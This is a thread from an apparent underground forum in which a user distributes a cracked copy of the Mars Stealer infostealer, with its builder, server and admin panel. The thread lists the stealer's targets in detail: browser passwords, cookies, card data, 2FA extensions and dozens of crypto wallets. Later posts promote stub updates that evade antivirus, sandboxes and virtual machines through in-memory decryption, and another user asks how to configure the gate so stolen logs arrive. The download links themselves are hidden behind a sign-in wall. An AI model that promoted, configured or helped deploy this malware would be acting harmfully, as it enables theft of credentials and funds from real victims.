Popular Post itsMe Posted August 27, 2021 Popular Post Share Posted August 27, 2021 (edited) This is the hidden content, please Sign In or Sign Up About the stealer (from the official thread): Browsers: Internet Explorer, Microsoft Edge Google Chrome, Chromium, Microsoft Edge (Chromium version), Kometa, Amigo, Torch, Orbitum, Comodo Dragon, Nichrome, Maxthon5, Maxthon6, Sputnik Browser, Epic Privacy Browser, Vivaldi, CocCoc, Uran Browser, QIP Surf, Cent Browser, Elements Browser, TorBro Browser, CryptoTab Browser, Brave Browser. Opera Stable, Opera GX, Opera Neon. Firefox, SlimBrowser, PaleMoon, Waterfox, Cyberfox, BlackHawk, IceCat, KMeleon, Thunderbird. Collects passwords, cookies, cc, autocomplete, history of visits to sites, history of downloading files. All the latest browser updates, including Chrome v80, are supported. 2FA Plugins: Authenticator, Authy, EOS Authenticator, GAuth Authenticator, Trezor Password Manager. Crypto plugins: TronLink, MetaMask, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitAppWallet, iWallet, Wombat, MEW CX, Guild Wallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, Leaf Wallet, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay, Coin98 Wallet. Wallets: Bitcoin Core and all derivatives (Dogecoin, Zcash, DashCore, LiteCoin, and so on), Ethereum, Electrum, Electrum LTC, Exodus, Electron Cash, MultiDoge, JAXX, Atomic, Binance, Coinomi. PC Data Collection: IP and Country, Operational Path to Mars EXE File in Progress, Local PC Time and Time Zone, System Language, Keyboard Language Layouts, Laptop/Desktop, Processor Model, Installed RAM Size, Operating System Version and Bitness, Video Card Model, Computer Name, User Name, Computer Domain Name (if any), Machine ID, GUID, List of Software installed in the system and its version" As you can see - the list is huge, the developers tried to collect, but, alas, not on optimization and protection. " --------------------- This is the hidden content, please Sign In or Sign Up MarsStealer_Menu.exe = Builder Mars_Stealer_cracked_by_LLCPPC.exe = Server Stealer Update: Completely redone the building, now everything has become much more convenient! 1. Rewrote the encryption, now you do not need to go to the site, enter the IP panel, gate, and the creator will encrypt the data himself! 2. Redesigned the building 3. Made the creation of the file "Builded.exe", so that many do not get confused how to use the created build CACA6fUr9ycXmy9YI2X7UDxyfV2IWpU50pmAGVdpYgJV0Q This is the hidden content, please Sign In or Sign Up Instructions for installing the panel - inside the folder. (instruction.txt) Soon I will make a software encryption so as not to run to the site... Important: libraries in the panel should remain in their place - /public/*.dll, because it is not yet possible to change the paths to libraries. Also - there is no possibility to change the download path, so the libraries are downloaded in C:\ProgramData. Although I have a suspicion that the developer himself did not allow this to change the buyers, despite the fact that each build downloads libraries along the same path, both in the panel and on the victim's PC... Panel: This is the hidden content, please Sign In or Sign Up Server Scan This is the hidden content, please Sign In or Sign Up https://www.kleenscan.com/scan_result/07f79cecff10bdb37fc917012daa4aab3febad0dc9dbb3413dd1d632b1d7b7a9 Edited August 27, 2021 by itsMe updated 3 Link to comment Share on other sites More sharing options...
acider Posted August 28, 2021 Share Posted August 28, 2021 great share bro Link to comment Share on other sites More sharing options...
Popular Post itsMe Posted August 31, 2021 Author Popular Post Share Posted August 31, 2021 Updated This is the hidden content, please Sign In or Sign Up Stub: * Added protection: 1000 processes for all occasions - all antiviruses, AnyRun, virtual machines including! (Attention: because of this, knocking may suffer, because on machines with antivirus - the code will not be decrypted) * Additional protection against virtual machines and antiviruses, by calculating the delay in clocks * Internal encryption of the code and lines of the decryption code of the section! * Decrypt the encrypted partition in memory, and transfer EntryPoint to the partition, right in memory! Who is your RunPE? * Cleaning memory, removing traces of decryption, lines (only for my stub) This is the last update, I will not support the patch anymore, because there are cases. This is the hidden content, please Sign In or Sign Up ---------- The same, but only without protection from antiviruses, at the request of a person (protection from virtual machines and AnyRun is present) This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
Def4lt Posted September 17, 2021 Share Posted September 17, 2021 i feel really dumb but my website doesn't have a dedicated ip. the panel is all setup but i can not get it to collect a log in the panel . can you show me 2 examples 1st example is the builder as website instead of ip, i put domain/panel/dashboard.php and gate i put domain/gate.php then in the db file i put domain/panel/dashboard.php am i doing it all wrong or am i just not getting logs Link to comment Share on other sites More sharing options...
Def4lt Posted September 17, 2021 Share Posted September 17, 2021 the 2nd example would be the db.php so i can understand Link to comment Share on other sites More sharing options...
Popular Post itsMe Posted September 17, 2021 Author Popular Post Share Posted September 17, 2021 @Def4lt Instruction.txt This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
DarkAvenger Posted September 19, 2021 Share Posted September 19, 2021 great share bro Link to comment Share on other sites More sharing options...
Recommended Posts